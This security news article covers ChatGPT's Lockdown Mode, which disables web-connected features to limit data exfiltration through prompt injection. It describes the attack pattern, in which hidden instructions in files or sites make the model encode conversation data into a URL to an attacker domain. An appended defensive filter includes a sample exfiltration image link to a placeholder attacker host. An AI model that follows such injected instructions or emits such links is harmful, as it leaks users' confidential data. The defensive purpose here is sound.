OpenAI Launches ChatGPT Lockdown Mode to Block Prompt Injection Data Exfiltration

5.70M+ users potentially affected
6 features disabled
4 account tiers covered
TL;DR
  • What: OpenAI released Lockdown Mode for ChatGPT, an optional security setting that disables web-connected features to prevent data exfiltration via prompt injection attacks.
  • Impact: Organizations handling sensitive data in ChatGPT conversations face ongoing risk of attackers extracting confidential information through malicious prompts embedded in uploaded files or browsed content.
  • Fix / mitigation: Enable Lockdown Mode in ChatGPT account settings to disable live web browsing, image support, deep research, agent mode, Canvas networking, and file downloads.
  • Who's at risk: ChatGPT users on Free, Go, Plus, Pro, and self-serve Business plans who process sensitive organizational or customer data through LLM interactions.

OpenAI has deployed Lockdown Mode for ChatGPT, a hardened security configuration designed to close data exfiltration pathways exploited through prompt injection attacks. Available now to logged-in users across Free, Go, Plus, Pro, and self-serve Business tiers, the feature targets organizations and individuals handling sensitive data who require stricter protection than standard ChatGPT sandboxing provides.

Prompt injection remains an unsolved foundational vulnerability across all large language models. Attackers embed malicious instructions in uploaded documents, website content, or file attachments that override the LLM's intended behavior. Once injected, these instructions can command the model to extract conversation history, uploaded files, or other sensitive context and transmit it to attacker-controlled infrastructure through outbound network requests.

What Lockdown Mode Actually Blocks

Lockdown Mode does not prevent prompt injections from occurring. OpenAI is explicit: malicious instructions hidden in uploaded files can still affect ChatGPT's behavior and cause incorrect answers. What Lockdown Mode does is eliminate the network-connected features attackers rely on to exfiltrate data after a successful injection.

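The feature disables six capabilities that can initiate outbound network requests: live web browsing, image support, deep research, agent mode, Canvas networking, and file downloads.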

Lockdown Mode Limitations

OpenAI warns that Lockdown Mode "does not guarantee that data exfiltration cannot happen." Risk remains through enabled third-party apps, unforeseen capability combinations, or newly discovered exfiltration techniques. Memory and file uploads continue to function normally, and conversation sharing is unaffected.

The Prompt Injection Problem

Prompt injection is what OpenAI calls a "frontier" problem – one that affects all LLMs architecturally and has no complete solution. Unlike traditional injection attacks (SQL injection, command injection) where input sanitization can block malicious payloads, LLMs are designed to follow instructions in natural language. Distinguishing between legitimate user instructions and attacker-injected commands embedded in processed content is fundamentally difficult.

Data exfiltration attacks typically follow this pattern: an attacker embeds malicious prompts in a PDF, website, or document. When a user uploads that file or asks ChatGPT to browse that site, the LLM processes the hidden instructions. The injected prompt commands the model to encode sensitive conversation data into a URL parameter and fetch an image or resource from an attacker-controlled domain. Standard ChatGPT sandboxing blocks some of these techniques, but Lockdown Mode adds defense-in-depth by removing the network features entirely.

Deployment Constraints

Lockdown Mode is mutually exclusive with Developer Mode. Enabling one automatically disables the other, forcing organizations to choose between maximum security posture and developer-focused features. OpenAI emphasizes the feature is "not intended for everyone" – the disabled capabilities represent core ChatGPT functionality that many workflows depend on. Organizations must assess whether their data sensitivity justifies the loss of web research, image analysis, and code execution capabilities.

Parallel Session Management Release

Alongside Lockdown Mode, OpenAI launched session management features that display all active ChatGPT sessions with device type, app, approximate location, sign-in timestamp, and trusted device status. Users can terminate individual sessions or all sessions if unauthorized access is detected – a standard security control that was previously absent.

Implementation Guidance

Security teams should evaluate Lockdown Mode deployment based on data classification. Enable it for users who routinely process customer PII, financial data, proprietary source code, or regulated health information through ChatGPT. For general productivity use cases where sensitive data exposure is minimal, the feature's restrictions likely outweigh its benefits.

Document which disabled features your organization relies on before enabling Lockdown Mode. Deep research and web browsing are frequently used for competitive intelligence and market research. Canvas is embedded in many software development workflows. File downloads support data science and analytics use cases. If these capabilities are critical, consider isolating sensitive data workloads to dedicated accounts with Lockdown Mode while maintaining standard ChatGPT access for general tasks.

The Bigger Picture

Lockdown Mode represents OpenAI's acknowledgment that prompt injection cannot be solved at the model level with current architectures. Instead of attempting to make LLMs immune to injected instructions, the approach shifts to containment: assume compromise will occur and eliminate exfiltration pathways. This mirrors traditional defense-in-depth strategies where perimeter breaches are assumed and lateral movement is constrained.

The limitation that third-party ChatGPT apps remain functional in Lockdown Mode is significant. The GPT Store hosts thousands of custom GPTs with varying security postures. Any app with network capabilities could potentially serve as an exfiltration channel even with Lockdown Mode enabled. Organizations with strict data protection requirements should audit which apps users have authorized and establish policies around third-party GPT usage.

For security teams building LLM-integrated applications, Lockdown Mode offers a preview of necessary architectural controls. Application-layer LLM deployments should implement similar network segmentation, limit outbound connections from LLM execution contexts, and assume that prompt injections will successfully manipulate model behavior. The focus should shift from preventing injection to preventing the consequences of injection.
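
The containment idea above, sketched as an added example (not OpenAI's implementation and not code from the original article): a filter an LLM-integrated application could run on model output before rendering it, removing markdown images, links and bare URLs that point outside an allowlist so an injected instruction has no rendered resource to carry data out. `ALLOWED_HOSTS`, the function names and the sample text are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts this application may load resources from.
ALLOWED_HOSTS = {"cdn.example.com"}

# Markdown image or link: optional "!", [label], (destination "title")
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
BARE_URL = re.compile(r"https?://[^\s<>()\"']+", re.I)

def host_allowed(url):
    """True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return False
    return parts.scheme == "https" and host in ALLOWED_HOSTS

def sanitize_model_output(text):
    """Return (safe_text, blocked_urls) for model output about to be rendered."""
    blocked = []
    def replace_ref(match):
        bang, label, url = match.groups()
        if host_allowed(url):
            return match.group(0)
        blocked.append(url)
        # Images are fetched automatically on render, so drop them; links keep their label.
        return "[image removed]" if bang else label
    def replace_bare(match):
        if host_allowed(match.group(0)):
            return match.group(0)
        blocked.append(match.group(0))
        return "[link removed]"

    text = MD_REF.sub(replace_ref, text)
    return BARE_URL.sub(replace_bare, text), blocked

# Constructed sample: output of a model that followed an injected instruction.
SAMPLE = (
    "Here is your summary.\n"
    "![status](https://collector.attacker.example/p.png?d=c2VjcmV0)\n"
    "Logo: ![logo](https://cdn.example.com/logo.png)\n"
    "See [the docs](https://cdn.example.com@attacker.example/x) for details."
)

if __name__ == "__main__":
    print(sanitize_model_output(SAMPLE))
```

Relative and non-https destinations are treated as disallowed, and the returned `blocked_urls` list is worth logging: a blocked URL carrying a long query string is a useful signal that an injection was attempted.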
